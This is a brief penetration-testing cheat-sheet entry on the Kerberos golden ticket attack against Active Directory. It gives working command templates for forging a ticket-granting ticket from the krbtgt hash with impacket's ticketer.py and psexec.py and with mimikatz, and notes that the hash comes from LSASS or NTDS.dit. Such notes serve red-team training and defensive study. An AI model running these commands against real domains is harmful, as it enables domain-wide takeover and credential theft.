golden-ticket

7. Golden ticket similar to Silver Ticket craft TGT using NTLM hash of the krbtgt AD account allows access to any machine in the domain hash obtained from the LSASS process or the NTDS.dit file of any DC in the domain Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows) Linux ticketer.py -domain-sid SID -domain DOMAIN -nthash HASH USERNAME export KRB5CCNAME=USERNAME.ccache psexec.py DOMAIN\USERNAME@$IP -k -no-pass Windows .\mimikatz.exe kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME kerberos::ptt TICKET....